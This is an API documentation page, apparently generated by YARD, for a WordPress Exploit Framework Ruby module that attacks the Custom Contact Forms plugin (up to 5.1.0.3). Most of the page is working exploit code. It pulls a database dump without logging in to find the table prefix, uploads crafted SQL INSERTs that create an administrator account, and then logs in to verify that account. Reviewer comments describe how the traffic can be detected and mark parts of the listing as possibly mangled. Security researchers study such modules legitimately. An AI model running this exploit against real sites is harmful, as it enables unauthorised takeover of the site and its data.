Class: Wpxf::Auxiliary::CustomContactFormsPrivilegeEscalation
- Includes:
- Wpxf, WordPress::Login
- Defined in:
- lib/wpxf/modules/auxiliary/priv_esc/custom_contact_forms_privilege_escalation.rb
Constant Summary
Constants included from WordPress::Options
WordPress::Options::WP_OPTION_CONTENT_DIR
Constants included from Net::HttpOptions
Net::HttpOptions::HTTP_OPTION_BASIC_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_CLIENT_TIMEOUT, Net::HttpOptions::HTTP_OPTION_FOLLOW_REDIRECT, Net::HttpOptions::HTTP_OPTION_HOST, Net::HttpOptions::HTTP_OPTION_HOST_VERIFICATION, Net::HttpOptions::HTTP_OPTION_MAX_CONCURRENCY, Net::HttpOptions::HTTP_OPTION_PEER_VERIFICATION, Net::HttpOptions::HTTP_OPTION_PORT, Net::HttpOptions::HTTP_OPTION_PROXY, Net::HttpOptions::HTTP_OPTION_PROXY_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_SSL, Net::HttpOptions::HTTP_OPTION_TARGET_URI, Net::HttpOptions::HTTP_OPTION_USER_AGENT, Net::HttpOptions::HTTP_OPTION_VHOST
Instance Attribute Summary
Attributes inherited from Module
#active_workspace, #event_emitter, #payload, #session_cookie
Attributes included from Options
Instance Method Summary
- #check ⇒ Object
- #hashed_password ⇒ Object
- #initialize ⇒ CustomContactFormsPrivilegeEscalation (constructor): A new instance of CustomContactFormsPrivilegeEscalation.
- #password ⇒ Object
- #payload_body_builder(prefix) ⇒ Object
- #run ⇒ Object
- #sql(prefix) ⇒ Object
- #sql_filename ⇒ Object
- #table_prefix ⇒ Object
- #username ⇒ Object
Methods included from WordPress::Login
#valid_wordpress_cookie?, #wordpress_login, #wordpress_login_post_body
Methods included from Wpxf
app_path, build_module_list, change_stdout_sync, custom_modules_path, data_directory, databases_path, gemspec, home_directory, load_custom_modules, load_module, modules_path, payloads_path, version
Methods inherited from Module
#aux_module?, #can_execute?, #check_wordpress_and_online, #cleanup, #exploit_module?, #missing_options, #set_option_value, #unset_option
Methods included from Db::Credentials
Methods included from ModuleAuthentication
#authenticate_with_wordpress, #requires_authentication
Methods included from WordPress::Urls
#wordpress_url_admin, #wordpress_url_admin_ajax, #wordpress_url_admin_options, #wordpress_url_admin_post, #wordpress_url_admin_profile, #wordpress_url_admin_update, #wordpress_url_atom, #wordpress_url_author, #wordpress_url_comments_post, #wordpress_url_login, #wordpress_url_new_user, #wordpress_url_opml, #wordpress_url_plugin_install, #wordpress_url_plugin_upload, #wordpress_url_plugins, #wordpress_url_post, #wordpress_url_rdf, #wordpress_url_readme, #wordpress_url_rest_api, #wordpress_url_rss, #wordpress_url_sitemap, #wordpress_url_themes, #wordpress_url_uploads, #wordpress_url_wp_content, #wordpress_url_xmlrpc
Methods included from WordPress::Options
Methods included from WordPress::Fingerprint
#check_plugin_version_from_changelog, #check_plugin_version_from_readme, #check_theme_version_from_readme, #check_theme_version_from_style, #check_version_from_custom_file, #wordpress_and_online?, #wordpress_version
Methods included from Net::HttpClient
#base_http_headers, #base_uri, #download_file, #execute_delete_request, #execute_get_request, #execute_post_request, #execute_put_request, #execute_queued_requests, #execute_request, #full_uri, #initialize_advanced_options, #initialize_options, #max_http_concurrency, #normalize_relative_uri, #normalize_uri, #queue_request, #target_host, #target_port, #target_uri
Methods included from Net::TyphoeusHelper
#advanced_typhoeus_options, #create_typhoeus_request, #create_typhoeus_request_options, #standard_typhoeus_options
Methods included from Net::UserAgent
#clients_by_frequency, #random_browser_and_os, #random_chrome_platform_string, #random_firefox_platform_string, #random_firefox_version_string, #random_iexplorer_platform_string, #random_opera_platform_string, #random_processor_string, #random_safari_platform_string, #random_time_string, #random_user_agent
Methods included from Versioning::OSVersions
#random_nt_version, #random_osx_version
Methods included from Versioning::BrowserVersions
#random_chrome_build_number, #random_chrome_version, #random_ie_version, #random_opera_version, #random_presto_version, #random_presto_version2, #random_safari_build_number, #random_safari_version, #random_trident_version
Methods included from Options
#all_options_valid?, #get_option, #get_option_value, #missing_options, #normalized_option_value, #option_valid?, #option_value?, #register_advanced_options, #register_evasion_options, #register_option, #register_options, #scoped_option_change, #set_option_value, #unregister_option, #unset_option
Methods included from OutputEmitters
#emit_error, #emit_info, #emit_success, #emit_table, #emit_warning
Methods included from ModuleInfo
#emit_usage_info, #module_author, #module_date, #module_desc, #module_description_preformatted, #module_name, #module_references, #update_info
Constructor Details
#initialize ⇒ CustomContactFormsPrivilegeEscalation
Returns a new instance of CustomContactFormsPrivilegeEscalation.
# File 'lib/wpxf/modules/auxiliary/priv_esc/custom_contact_forms_privilege_escalation.rb', line 7
# Registers the module's metadata (name, description, authors, references,
# date) and the two string options read at run time, 'username' and
# 'password', both defaulting to random alphabetic values from
# Utility::Text.rand_alpha.
#
# NOTE(review): the array of StringOption objects is wrapped in bare
# parentheses with no receiving method visible, which makes it a no-op
# expression as written. The call target (presumably register_options, listed
# under Options on this page) was most likely dropped when the listing was
# rendered — verify against the source file.
def initialize
  super
  update_info(
    name: 'Custom Contact Forms Privilege Escalation',
    desc: 'The Custom Contact Forms plugin, up to and including version '\
          '5.1.0.3, allows unauthenticated users to create new admin users '\
          'due to lack of validation when uploading SQL files.',
    author: [
      'Marc-Alexandre Montpas', # Vulnerability discovery
      'rastating' # WPXF module
    ],
    references: [
      ['URL', 'http://blog.sucuri.net/2014/08/database-takeover-in-custom-contact-forms.html'],
      ['URL', 'https://plugins.trac.wordpress.org/changeset?old_path=%2Fcustom-contact-forms%2Ftags%2F5.1.0.3&old=997569&new_path=%2Fcustom-contact-forms%2Ftags%2F5.1.0.4&new=997569&sfp_email=&sfph_mail='],
      ['WPVDB', '7542']
    ],
    date: 'Aug 07 2014'
  )
  # Options consumed by #username and #password via normalized_option_value.
  ([
    StringOption.new(
      name: 'username',
      desc: 'The username to register with',
      default: Utility::Text.rand_alpha(10)
    ),
    StringOption.new(
      name: 'password',
      desc: 'The password to register with',
      default: Utility::Text.rand_alpha(rand(10..20))
    )
  ])
end
Instance Method Details
#check ⇒ Object
# File 'lib/wpxf/modules/auxiliary/priv_esc/custom_contact_forms_privilege_escalation.rb', line 53
# Version check: reads the plugin version from the 'custom-contact-forms'
# readme and compares it with '5.1.0.4', the release the changeset reference
# in #initialize diffs to. The comparison semantics live in
# check_plugin_version_from_readme (WordPress::Fingerprint).
def check
  plugin_slug = 'custom-contact-forms'
  fixed_version = '5.1.0.4'
  check_plugin_version_from_readme(plugin_slug, fixed_version)
end
#hashed_password ⇒ Object
# File 'lib/wpxf/modules/auxiliary/priv_esc/custom_contact_forms_privilege_escalation.rb', line 49
# MD5 digest (via Utility::Text.md5) of the configured password; this is the
# value #sql writes into the users table's user_pass column.
def hashed_password
  plaintext = password
  Utility::Text.md5(plaintext)
end
#password ⇒ Object
# File 'lib/wpxf/modules/auxiliary/priv_esc/custom_contact_forms_privilege_escalation.rb', line 45
# The normalized value of the 'password' option registered in #initialize.
def password
  option_name = 'password'
  normalized_option_value(option_name)
end
#payload_body_builder(prefix) ⇒ Object
# File 'lib/wpxf/modules/auxiliary/priv_esc/custom_contact_forms_privilege_escalation.rb', line 82
# Assembles the multipart form #run posts: the SQL from #sql(prefix) as an
# uploaded file named by #sql_filename under the 'import_file' field, plus
# the 'ccf_merge_import' => '1' field. Returns the Utility::BodyBuilder so
# the caller can invoke #create on it.
#
# @param prefix [String] database table prefix discovered by #table_prefix
def payload_body_builder(prefix)
  Utility::BodyBuilder.new.tap do |form|
    form.add_file_from_string('import_file', sql(prefix), sql_filename)
    form.add_field('ccf_merge_import', '1')
  end
end
#run ⇒ Object
# File 'lib/wpxf/modules/auxiliary/priv_esc/custom_contact_forms_privilege_escalation.rb', line 89
# Entry point. Returns true only when a user can be created through the
# plugin's SQL import and then used to log in; returns false at the first
# failure (super returning false, prefix discovery failing, an unexpected
# HTTP response, or the login check failing).
#
# Every step is visible on the wire, which is what makes it detectable: two
# POSTs to wordpress_url_admin_post with no login before either in this
# listing, the second a multipart upload of a random-named .sql file together
# with ccf_merge_import=1, answered with a 302 whose Location is
# options-general.php?page=custom-contact-forms, then a wordpress_login
# attempt for the freshly registered username.
def run
  # The Module base class decides whether the module may run at all.
  return false unless super
  emit_info 'Extracting table prefix...'
  # The prefix is needed so #sql can name the users/usermeta tables.
  prefix = table_prefix
  if prefix.nil?
    emit_error 'Unable to determine table prefix'
    return false
  else
    emit_success "Found table prefix: #{prefix}", true
  end
  emit_info 'Creating new admin user...'
  res = nil
  # Redirect following is disabled so the raw 302 and its Location header
  # can be inspected instead of the page it points to.
  # NOTE(review): res is only assigned inside the create block; if the
  # builder ever fails to yield, res stays nil and res.code below raises.
  payload_body_builder(prefix).create do |body|
    scoped_option_change('follow_http_redirection', false) do
      res = execute_post_request(url: wordpress_url_admin_post, body: body)
    end
  end
  # The redirect back to the plugin's settings page is the only success
  # signal the import handler gives; anything else is treated as failure.
  if res.code != 302 || res.headers['Location'] != 'options-general.php?page=custom-contact-forms'
    emit_error 'Failed to create new user'
    emit_error "Code: #{res.code}", true
    emit_error "Location header: #{res.headers['Location']}", true
    return false
  end
  emit_info 'Verifying new account...'
  # The account is confirmed by actually authenticating, not by the
  # redirect alone. Note the plaintext password is echoed in the success
  # message and will end up in whatever captures module output.
  if wordpress_login(username, password)
    emit_success "User #{username} with password #{password} successfully created"
    return true
  else
    emit_error 'Failed to create new user'
    return false
  end
end
#sql(prefix) ⇒ Object
# File 'lib/wpxf/modules/auxiliary/priv_esc/custom_contact_forms_privilege_escalation.rb', line 71
# The SQL carried by the import upload built in #payload_body_builder: one
# INSERT into the users table with the configured username and
# #hashed_password, and one INSERT into usermeta that gives that user the
# 'administrator' capability and user_level '10'. The table prefix is the
# value returned by #table_prefix.
#
# The username and hash are interpolated verbatim; a 'username' option value
# containing a single quote produces malformed SQL rather than a user.
#
# NOTE(review): the rendered listing collapsed this heredoc onto one line.
# The line breaks below are reconstructed and any indentation inside the
# heredoc (which <<- preserves as part of the string) cannot be recovered
# from the page — confirm against the source file.
#
# @param prefix [String] database table prefix
# @return [String] two INSERT statements terminated by ';'
def sql(prefix)
  <<-END_OF_SQL
INSERT INTO #{prefix}users (user_login, user_pass) VALUES ('#{username}','#{hashed_password}');
INSERT INTO #{prefix}usermeta (user_id, meta_key, meta_value) VALUES ((select id from #{prefix}users where user_login='#{username}'),'#{prefix}capabilities','a:1:{s:13:"administrator";b:1;}'),((select id from #{prefix}users where user_login='#{username}'),'#{prefix}user_level','10');
  END_OF_SQL
end
#sql_filename ⇒ Object
# File 'lib/wpxf/modules/auxiliary/priv_esc/custom_contact_forms_privilege_escalation.rb', line 78
# A fresh random five-letter file name with a '.sql' extension, used as the
# uploaded file's name in #payload_body_builder. A new name is generated on
# every call.
def sql_filename
  stem = Utility::Text.rand_alpha(5)
  [stem, 'sql'].join('.')
end
#table_prefix ⇒ Object
# File 'lib/wpxf/modules/auxiliary/priv_esc/custom_contact_forms_privilege_escalation.rb', line 57
# Discovers the WordPress table prefix by posting ccf_export=1 to
# wordpress_url_admin_post and scanning the returned body for an
# "insert into `<prefix>customcontactforms_fields`" statement.
#
# Returns the captured prefix (including its trailing underscore), or nil
# when the response is not a 200 with a non-empty body or the pattern is
# not found. That a plain POST returns a SQL dump here is itself the
# condition worth alerting on from the server side.
#
# @return [String, nil]
def table_prefix
  res = execute_post_request(url: wordpress_url_admin_post, body: { 'ccf_export' => '1' })
  return nil unless res.code == 200
  dump = res.body
  return nil if dump.nil? || dump.empty?
  prefix_match = dump.match(/insert into `(.+_)customcontactforms_fields`/i)
  return nil if prefix_match.nil? || prefix_match.length < 2
  prefix_match[1]
end
#username ⇒ Object
# File 'lib/wpxf/modules/auxiliary/priv_esc/custom_contact_forms_privilege_escalation.rb', line 41
# The normalized value of the 'username' option registered in #initialize.
def username
  option_name = 'username'
  normalized_option_value(option_name)
end